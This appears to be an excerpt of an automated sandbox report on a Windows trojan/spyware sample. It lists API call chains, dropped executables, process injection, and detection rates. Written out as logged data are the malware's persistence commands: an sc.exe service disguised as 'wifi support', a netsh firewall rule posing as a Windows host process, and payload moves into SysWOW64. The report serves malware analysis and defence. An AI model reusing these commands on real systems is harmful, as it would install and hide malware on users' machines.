                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_2_00402491 NtOpenKey,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeCode function: 1_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 12_2_00530110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaCode function: 13_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04D7F5C0 NtUnmapViewOfSection,
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeCode function: 20_2_04D7F6A0 NtAllocateVirtualMemory,
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                          Source: 0Cjy7Lkv1A.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 8008.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 1BCC.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 60C2.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 7063.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: A8FB.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: ujhcrda.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: szdcdkt.exe.19.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 6674.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: 8B25.exe.5.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                          Source: 9874.exe.5.drStatic PE information: Section: .rsrc ZLIB complexity 0.996134750716
                          Source: 5126.exe.5.drStatic PE information: Section: .rsrc ZLIB complexity 0.997770524618
                          Source: 6674.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: 6674.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: 0Cjy7Lkv1A.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ujhcrdaJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@56/31@94/17
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeCode function: 36_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 39_2_00A59A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: 0Cjy7Lkv1A.exeVirustotal: Detection: 37%
                          Source: 0Cjy7Lkv1A.exeReversingLabs: Detection: 53%
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\0Cjy7Lkv1A.exe "C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeProcess created: C:\Users\user\Desktop\0Cjy7Lkv1A.exe "C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\ujhcrda C:\Users\user\AppData\Roaming\ujhcrda
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaProcess created: C:\Users\user\AppData\Roaming\ujhcrda C:\Users\user\AppData\Roaming\ujhcrda
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\60C2.exe C:\Users\user\AppData\Local\Temp\60C2.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7063.exe C:\Users\user\AppData\Local\Temp\7063.exe
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 520
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A8FB.exe C:\Users\user\AppData\Local\Temp\A8FB.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uuqefjyt\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description uuqefjyt "wifi internet conection
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start uuqefjyt
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: unknownProcess created: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d"C:\Users\user\AppData\Local\Temp\A8FB.exe"
                          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1BCC.exe C:\Users\user\AppData\Local\Temp\1BCC.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\382E.exe C:\Users\user\AppData\Local\Temp\382E.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\ujhcrda C:\Users\user\AppData\Roaming\ujhcrda
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5126.exe C:\Users\user\AppData\Local\Temp\5126.exe
                          Source: C:\Users\user\Desktop\0Cjy7Lkv1A.exeProcess created: C:\Users\user\Desktop\0Cjy7Lkv1A.exe "C:\Users\user\Desktop\0Cjy7Lkv1A.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\60C2.exe C:\Users\user\AppData\Local\Temp\60C2.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7063.exe C:\Users\user\AppData\Local\Temp\7063.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A8FB.exe C:\Users\user\AppData\Local\Temp\A8FB.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
                          Source: C:\Users\user\AppData\Roaming\ujhcrdaProcess created: C:\Users\user\AppData\Roaming\ujhcrda C:\Users\user\AppData\Roaming\ujhcrda
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6188 -ip 6188
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 520
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uuqefjyt\
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\szdcdkt.exe" C:\Windows\SysWOW64\uuqefjyt\
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create uuqefjyt binPath= "C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe /d\"C:\Users\user\AppData\Local\Temp\A8FB.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description uuqefjyt "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start uuqefjyt
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeProcess created: C:\Users\user\AppData\Local\Temp\B3BA.exe C:\Users\user\AppData\Local\Temp\B3BA.exe
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\60C2.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\B3BA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6188
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2968:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5668:64:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_01
                          Source: B3BA.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: B3BA.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.2.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.2.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 20.0.B3BA.exe.370000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\60C2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: 0Cjy7Lkv1A.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: profapi.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 60C2.exe, 0000000E.00000002.521453643.0000000000413000.00000002.00020000.sdmp, 60C2.exe, 0000000E.00000000.454922843.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000012.00000002.520151138.0000000004F70000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: shcore.pdb~Sihc source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.473871600.0000000004B27000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: powrprof.pdbxSohi source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: C:\zoro\veme_81\vujiwoli76 gag\sipowatelunem36\locufiyazed.pdb source: 7063.exe, 00000011.00000000.468936962.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: fltLib.pdblS[ha source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdbrSUhr source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: TC:\sejuyupe34\tehajogim\xabed.pdb source: A8FB.exe, 00000013.00000000.474529040.0000000000413000.00000002.00020000.sdmp, A8FB.exe, 00000013.00000002.499568832.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000002.510363795.0000000000415000.00000002.00020000.sdmp, szdcdkt.exe, 00000024.00000000.499129380.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.479801619.0000000004E81000.00000004.00000001.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.479824759.0000000004E50000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.479841946.0000000004E56000.00000004.00000040.sdmp
